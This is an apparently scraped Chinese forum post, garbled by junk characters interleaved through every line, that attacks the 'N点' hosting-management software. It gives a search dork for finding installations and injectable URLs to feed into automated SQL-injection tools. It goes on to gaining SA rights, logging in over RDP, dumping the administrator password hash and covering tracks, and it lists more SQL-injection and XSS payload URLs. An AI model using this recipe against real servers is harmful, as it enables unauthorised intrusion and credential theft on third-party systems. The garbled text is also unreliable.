不得不说N点实在是一个破东西3 L% F& L7 m, X9 m/ Y
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂, J" c/ q; p0 ~( l+ w
好吧 抱怨一下就行了 接下来关键的时候到了
! I! q' P, d' \0 ]4 D首先百度搜索关键字:inurl: (mmdatabase.asp)
5 M' F' L! X4 P& i' p我随便列举一个: www.xxxx.com/ |2 V' m1 N/ u: g1 z
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1, ?/ |& r9 e, X: J# @( U& l9 S6 j
扔入NBSI 或者啊D等各种傻逼工具后) C$ w) e! I5 g+ ]% a$ ]
你们会看到是SA权限
7 H k6 c2 d* z) T) Y果断3389 上去 hash得到administrator密码. X, {- D6 B0 U7 g6 \( |2 s
擦屁股走人~ l. T7 v7 A8 `: v! _+ O
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的( B. ]1 \3 z, }
l; E" l, S- Z9 y
再附上其他几个漏洞页面9 u- m; f# c( Q* c
SQL:1 H& d" ?0 D1 M* p; [, J m; P, U
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=17 k' ]. w4 L3 v7 D
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11# l; [! e9 b0 }3 {/ r* f, V
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
% d9 o& v3 V& f; P) h3 U% Ehttp://www.xxxxxx.com:80/Style/vhosting.asp?classID=26 J- Z+ o- P, S, S2 W1 f
XSS证明:/ R- N& ?4 j5 z
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
' H. l k& N- mhttp://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”% R% N3 ~( O$ _0 c$ X# o" _
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>
! y: H3 l: K& r) B8 q1 @由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
- K; ]6 h& z( i1 ~! M: C还是星外吧 你们懂的+ K+ @! X6 [2 x( S
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?- o, z- u) L6 F) O; p5 D) A
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
1 \# r1 m. G; I M——- |